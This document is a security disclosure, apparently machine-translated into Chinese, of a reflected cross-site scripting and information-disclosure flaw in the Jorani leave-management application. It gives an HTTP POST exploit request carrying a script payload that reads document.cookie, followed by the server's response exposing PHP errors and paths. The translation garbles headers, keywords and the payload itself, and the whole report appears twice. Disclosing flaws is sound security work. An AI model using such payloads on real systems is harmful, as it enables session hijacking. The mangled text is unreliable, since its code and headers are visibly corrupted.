## title: Jorani V1.0.3-(C)2014-2023-XSS反射信息披露
##作者: nu11secur1ty
## date: 08/27/2023
## Vendor: https://jorani.org/
## Software: https://demo.jorani.org/session/login
##参考: https://portswigger.net/web-security/cross-site-scripting
##参考: https://portswigger.net/web-security/information-discluse
## Description:
“语言请求”参数的值已复制到
JavaScript字符串被封装在双引号标记中。这
有效载荷75943';警报(1)//569在语言参数中提交。
该输入在应用程序的响应中未修改。
攻击者可以修改令牌会话,他可以发现
服务器的敏感信息。
状态:高价值
[+] exploit:
``邮报
发布/会话/登录http/1.1
host: demo.jorani.org
Accept-incoding: Gzip,放气
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
Accept-Language: en-us; q=0.9,en; q=0.8
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
AppleWebkit/537.36(Khtml,像壁虎一样)Chrome/116.0.5845.111
Safari/537.36
连接:关闭
cache-control: max-age=0
Cookie: CSRF_COOKIE_JORANI=9B4B02ECE59E0F321CD0324A633B5DD2;
Jorani_session=FBC630D2510FFD2A981CCFE97301B1B90AB47DC#攻击
Origin: http://demo.jorani.org
升级- 不肯定- requests: 1
Referer: http://demo.jorani.org/session/login
content-type:应用程序/x-www-form-urlenceded
sec-ch-ua:'.not/a)品牌'; v='99','google chrome'; v='116','chromium'; v='116'
sec-ch-ua-platform:窗口
sec-ch-ua-mobile:0
内容长度: 183
CSRF_TEST_JORANI=9B4B02ECE59E0F321CD0324A633B5DD2D2LAST_PAGE=SESSION=session%2floginlanguage=en-gbarh5l%22%22%22%3E%3E%3E%3CScript%3aAalert%3aeAlert(document.cookie.cookie.cookie.cookie.cookie)%3C%3C%2 ffscrip=blaletcip=blaletcip=blaletcip=bbalig=blalertcip=blaler
````````
[+]响应:
````http
http/1.1 200好
Date: Sun,2023年8月27日06:03:04 GMT
content-type:文本/html; charset=UTF-8
内容长度: 681
Server: Apache
X-Power-By: php/8.2
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
set-cookie: csrf_cookie_jorani=9B4B02ECE59E0F321CD0324A633B5DD2;
到期=太阳,2023年8月27日08:03:04 GMT; max-age=7200;路径=/;
samesite=严格
set-cookie: jorani_session=9AE823FFA74D722C809F6BDA6999954593483F2CFD;
到期=太阳,2023年8月27日08:03:04 GMT; max-age=7200;路径=/; httponly;
samesite=lax
Last-Modified:太阳,2023年8月27日06:03:04 GMT
VARY:接受编码
cache-control:私人,无填充,无存储,替代替补箱,
无转变,必备的重新值
pragma:无缓存
X-pipb-request-id: 3E497A1D:118A_D5BA211833333333333333333333333333333333333364EAE718_12C0:1FBA1
X-PIPLB-INSTANCE: 27474
连接:关闭
div style='border:1px实心#990000; padding-left:20px; margin:0 0 10px 0;'
遇到H4A PHP错误/H4
Pseverity: 8192/p
pmessage: strlen():将null传递到类型的参数#1($ string)
字符串已弃用/p
pfilename:控制器/Connection.php/p
Pline Number: 126/p
/div
div style='border:1px实心#990000; padding-left:20px; margin:0 0 10px 0;'
遇到H4A PHP错误/H4
Pseverity:警告/p
PMESSAGE:无法修改标头信息- 标题已经发送
by(输出开始
/home/decouvric/demo.jorani.org/system/core/exceptions.php:272)/p
pfilename:帮助者/url_helper.php/p
Pline Number: 565/p
/div
````````
##复制:
[href](https://github.com/nu11secur1ty/cve...n/main/vendors/jorani/2023/jorani-v1.0.3-ph1;
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2014-2023-benjamin-balet.html)
##时间花费:
01:35:00
##作者: nu11secur1ty
## date: 08/27/2023
## Vendor: https://jorani.org/
## Software: https://demo.jorani.org/session/login
##参考: https://portswigger.net/web-security/cross-site-scripting
##参考: https://portswigger.net/web-security/information-discluse
## Description:
“语言请求”参数的值已复制到
JavaScript字符串被封装在双引号标记中。这
有效载荷75943';警报(1)//569在语言参数中提交。
该输入在应用程序的响应中未修改。
攻击者可以修改令牌会话,他可以发现
服务器的敏感信息。
状态:高价值
[+] exploit:
``邮报
发布/会话/登录http/1.1
host: demo.jorani.org
Accept-incoding: Gzip,放气
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
Accept-Language: en-us; q=0.9,en; q=0.8
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
AppleWebkit/537.36(Khtml,像壁虎一样)Chrome/116.0.5845.111
Safari/537.36
连接:关闭
cache-control: max-age=0
Cookie: CSRF_COOKIE_JORANI=9B4B02ECE59E0F321CD0324A633B5DD2;
Jorani_session=FBC630D2510FFD2A981CCFE97301B1B90AB47DC#攻击
Origin: http://demo.jorani.org
升级- 不肯定- requests: 1
Referer: http://demo.jorani.org/session/login
content-type:应用程序/x-www-form-urlenceded
sec-ch-ua:'.not/a)品牌'; v='99','google chrome'; v='116','chromium'; v='116'
sec-ch-ua-platform:窗口
sec-ch-ua-mobile:0
内容长度: 183
CSRF_TEST_JORANI=9B4B02ECE59E0F321CD0324A633B5DD2D2LAST_PAGE=SESSION=session%2floginlanguage=en-gbarh5l%22%22%22%3E%3E%3E%3CScript%3aAalert%3aeAlert(document.cookie.cookie.cookie.cookie.cookie)%3C%3C%2 ffscrip=blaletcip=blaletcip=blaletcip=bbalig=blalertcip=blaler
````````
[+]响应:
````http
http/1.1 200好
Date: Sun,2023年8月27日06:03:04 GMT
content-type:文本/html; charset=UTF-8
内容长度: 681
Server: Apache
X-Power-By: php/8.2
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
set-cookie: csrf_cookie_jorani=9B4B02ECE59E0F321CD0324A633B5DD2;
到期=太阳,2023年8月27日08:03:04 GMT; max-age=7200;路径=/;
samesite=严格
set-cookie: jorani_session=9AE823FFA74D722C809F6BDA6999954593483F2CFD;
到期=太阳,2023年8月27日08:03:04 GMT; max-age=7200;路径=/; httponly;
samesite=lax
Last-Modified:太阳,2023年8月27日06:03:04 GMT
VARY:接受编码
cache-control:私人,无填充,无存储,替代替补箱,
无转变,必备的重新值
pragma:无缓存
X-pipb-request-id: 3E497A1D:118A_D5BA211833333333333333333333333333333333333364EAE718_12C0:1FBA1
X-PIPLB-INSTANCE: 27474
连接:关闭
div style='border:1px实心#990000; padding-left:20px; margin:0 0 10px 0;'
遇到H4A PHP错误/H4
Pseverity: 8192/p
pmessage: strlen():将null传递到类型的参数#1($ string)
字符串已弃用/p
pfilename:控制器/Connection.php/p
Pline Number: 126/p
/div
div style='border:1px实心#990000; padding-left:20px; margin:0 0 10px 0;'
遇到H4A PHP错误/H4
Pseverity:警告/p
PMESSAGE:无法修改标头信息- 标题已经发送
by(输出开始
/home/decouvric/demo.jorani.org/system/core/exceptions.php:272)/p
pfilename:帮助者/url_helper.php/p
Pline Number: 565/p
/div
````````
##复制:
[href](https://github.com/nu11secur1ty/cve...n/main/vendors/jorani/2023/jorani-v1.0.3-ph1;
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2014-2023-benjamin-balet.html)
##时间花费:
01:35:00